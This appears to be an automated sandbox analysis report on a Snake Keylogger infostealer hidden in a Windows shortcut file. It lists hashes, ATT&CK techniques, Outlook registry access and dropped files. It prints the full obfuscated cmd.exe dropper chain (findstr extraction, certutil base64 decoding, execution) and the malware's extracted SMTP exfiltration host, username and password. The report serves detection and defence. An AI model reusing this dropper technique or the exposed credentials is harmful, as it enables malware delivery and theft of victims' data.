snakekeylogger | dc79a6058912f81a0b7f112dc83902fc482c9d7be12450c6911028ebd66a1bce

General

Target

Img-scan161023.lnk
Size

189KB
MD5

004667e1a9cb1ee8de89d34330a3d6df
SHA1

43563c2cc91b1070c064a7668e27dd9498a8954c
SHA256

dc79a6058912f81a0b7f112dc83902fc482c9d7be12450c6911028ebd66a1bce
SHA512

b027cd6a63614c1bd76fb5a68cc2e0469016b080836df8b251b6b45fae5bb7e7a8834bb70b5f1dca29539981c51f924684aa25b26be57803eb26a74be0e78f62
SSDEEP

3072:mPSEKR8itPqPiGjuyLAfOjRBM/JgQMHMJJActNlXrX:mP/KR8SZggG/SJgdOJ/Nh

Score

10^/10

snakekeylogger collection keylogger spyware stealer

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.avtorska.com.mk
Port:
587
Username:
[email protected]
Password:
avtorska2014@

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.avtorska.com.mk
Port:
587
Username:
[email protected]
Password:
avtorska2014@
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk	family_snakekeylogger
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk	family_snakekeylogger
behavioral2/memory/4048-6-0x00000000000F0000-0x0000000000116000-memory.dmp	family_snakekeylogger

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation cmd.exe
Executes dropped EXE 1 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

pid process

4048 8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
4048	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
Key opened	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
Key opened	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 checkip.dyndns.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

pid process

4048 8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
4048 8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description pid process

Token: SeDebugPrivilege 4048 8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

flow	ioc
12	checkip.dyndns.org

pid	process
4048	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
4048	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description	pid	process
Token: SeDebugPrivilege	4048	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 1148 wrote to memory of 4860	1148	cmd.exe	cmd.exe
PID 1148 wrote to memory of 4860	1148	cmd.exe	cmd.exe
PID 4860 wrote to memory of 3904	4860	cmd.exe	findstr.exe
PID 4860 wrote to memory of 3904	4860	cmd.exe	findstr.exe
PID 4860 wrote to memory of 3676	4860	cmd.exe	certutil.exe
PID 4860 wrote to memory of 3676	4860	cmd.exe	certutil.exe
PID 4860 wrote to memory of 4048	4860	cmd.exe	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
PID 4860 wrote to memory of 4048	4860	cmd.exe	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

outlook_office_path 1 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

outlook_win_path 1 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Img-scan161023.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "5Gjnfd4d3QNufvx8YCkJ9bvzBuj9D2V9xEeAPtnwLn05q8iqSxBieR9yM5wM1EzopYAhI95naJeJwD2aaTe1Fl5wU3FXKsNrAEJJ7tcRYkcsCuIX3vVVNTnlifpCkkvWXw4iKb5flm23Tm5lw1d6kY0DnB4LsRsxDTvAhBYFuKndNcmgiQwwfBhdlH6m9w3WxTX4yRofHgkOdDbQXDqPh8NgmZ5bdFKm2OawlYzouiHaSZ1UJDUJ2dD4k5 & findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" Img-scan161023.lnk>C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp & certutil -decode C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk & start C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk & del C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp & exit & 5Gjnfd4d3QNufvx8YCkJ9bvzBuj9D2V9xEeAPtnwLn05q8iqSxBieR9yM5wM1EzopYAhI95naJeJwD2aaTe1Fl5wU3FXKsNrAEJJ7tcRYkcsCuIX3vVVNTnlifpCkkvWXw4iKb5flm23Tm5lw1d6kY0DnB4LsRsxDTvAhBYFuKndNcmgiQwwfBhdlH6m9w3WxTX4yRofHgkOdDbQXDqPh8NgmZ5bdFKm2OawlYzouiHaSZ1UJDUJ2dD4k5"
2⤵
- Suspicious use of WriteProcessMemory
PID:4860

C:\Windows\system32\findstr.exe
findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" Img-scan161023.lnk
3⤵
PID:3904

C:\Windows\system32\certutil.exe
certutil -decode C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
3⤵
PID:3676

C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

2

T1552

Credentials In Files

2

T1552.001

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Filesize
139KB

MD5
68504fdedac71520aa3b8eba37fdae9b

SHA1
831aea37e298c64ad994aedaa69b4caae122eb3c

SHA256
57f31e6bd1e6732e06c90abd4b88d2e0e8c88287851f56d908184665480bfff4

SHA512
d0b7aa9bcc1b6c7b59ee095e95754b62033c80e7d961c536ab5d82d7f5641a8474df58b104f6bb4c5db754124a3f2c6c1b08808453ded8316a99b236a160a067

Download Submit
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Filesize
139KB

MD5
68504fdedac71520aa3b8eba37fdae9b

SHA1
831aea37e298c64ad994aedaa69b4caae122eb3c

SHA256
57f31e6bd1e6732e06c90abd4b88d2e0e8c88287851f56d908184665480bfff4

SHA512
d0b7aa9bcc1b6c7b59ee095e95754b62033c80e7d961c536ab5d82d7f5641a8474df58b104f6bb4c5db754124a3f2c6c1b08808453ded8316a99b236a160a067

Download Submit
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp

Filesize
186KB

MD5
e22740ac84d16043fce83d052e2cc391

SHA1
ca573054e4e717c7ed55ad6f895a8e5d4ccb36b6

SHA256
790213375ab5ae76cd8b290cae590d4ffafb0d5e4052fdeaf777c7746195ec27

SHA512
8a06d915a92cf014c2f214f9207c200400c582126dee82f19361cb376caeff5a04f7704ad13ecacc0d750a1fefc56de91d3cb47ef316ec97c4d3d9637a4a9dd2

Download Submit
memory/4048-6-0x00000000000F0000-0x0000000000116000-memory.dmp

Filesize
152KB

Download
memory/4048-7-0x00007FFE22600000-0x00007FFE230C1000-memory.dmp

Filesize
10.8MB

Download
memory/4048-8-0x000000001BC90000-0x000000001BCA0000-memory.dmp

Filesize
64KB

Download
memory/4048-9-0x00007FFE22600000-0x00007FFE230C1000-memory.dmp

Filesize
10.8MB

Download
memory/4048-10-0x000000001BC90000-0x000000001BCA0000-memory.dmp

Filesize
64KB

Download
memory/4048-11-0x0000000000F90000-0x0000000000FE0000-memory.dmp

Filesize
320KB

Download
memory/4048-12-0x000000001DCB0000-0x000000001DE72000-memory.dmp

Filesize
1.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads